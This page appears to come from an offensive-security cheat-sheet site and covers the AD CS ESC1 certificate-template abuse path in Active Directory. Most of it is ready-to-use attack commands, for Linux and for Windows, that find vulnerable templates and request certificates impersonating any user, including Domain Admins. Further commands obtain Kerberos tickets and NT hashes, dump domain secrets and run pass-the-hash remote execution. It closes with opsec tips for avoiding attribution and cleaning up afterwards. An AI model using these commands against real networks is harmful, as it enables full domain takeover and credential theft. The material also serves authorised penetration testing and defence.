🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🩸 BloodHound / ADCSESC1

ADCSESC1

ESC1: SAN abuse β€” enroll in a template with Client Authentication EKU where enrollee supplies Subject Alternative Name, allowing impersonation of any AD user including Domain Admins.

Applies to: Users/Computers with Enroll rights β†’ vulnerable certificate template β†’ Enterprise CA

Linux Abuse

certipy-ad

# Step 1: Find vulnerable templates
certipy-ad find -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> -vulnerable -stdout

# Step 2: Request cert with arbitrary UPN (impersonate target)
certipy-ad req -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
  -ca '<ca>' -target <ca-host> -template '<template>' \
  -upn <target-user>@<domain>

# Step 2a: With SID (required if strong cert mapping enforced)
certipy-ad req -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
  -ca '<ca>' -target <ca-host> -template '<template>' \
  -upn <target-user>@<domain> \
  -sid 'S-1-5-21-<domain-sid>-<rid>'

# Step 3: Authenticate β€” get NT hash + TGT
certipy-ad auth -pfx <target-user>.pfx -dc-ip <dc-ip>

# Step 4: PTH / secretsdump
secretsdump.py -hashes ':<ntlm-hash>' '<domain>/Administrator@<dc-ip>'

Impacket (pass-the-hash after auth)

secretsdump.py -hashes ':<ntlm-hash>' '<domain>/<target-user>@<dc-ip>'
wmiexec.py -hashes ':<ntlm-hash>' '<domain>/<target-user>@<dc-ip>'

Windows Abuse

Certify.exe + Rubeus

# Step 1: Find vulnerable templates
Certify.exe find /vulnerable

# Step 2: Request certificate with target UPN
Certify.exe request /ca:<ca-host>\<ca> /template:<template> /upn:<target-user>@<domain> /sid:S-1-5-21-<domain-sid>-<rid>

# Convert PEM to PFX (openssl on attacker box, or use Certify output)
openssl pkcs12 -in cert.pem -keyfile key.pem -export -out <target-user>.pfx

# Step 3: Request TGT and inject
Rubeus.exe asktgt /user:<target-user> /domain:<domain> /certificate:<pfx-base64> /password:<pfx-password> /ptt

# Verify
klist

Opsec

  • CA stores a copy of every issued certificate in its Issued Certificates store β€” defenders can identify the requesting principal and the impersonated UPN.
  • Prefer enrolling as a low-privilege account; the requesting identity is logged, not the impersonated one.
  • Clean up: the PFX and any exported certs should be deleted post-exploitation.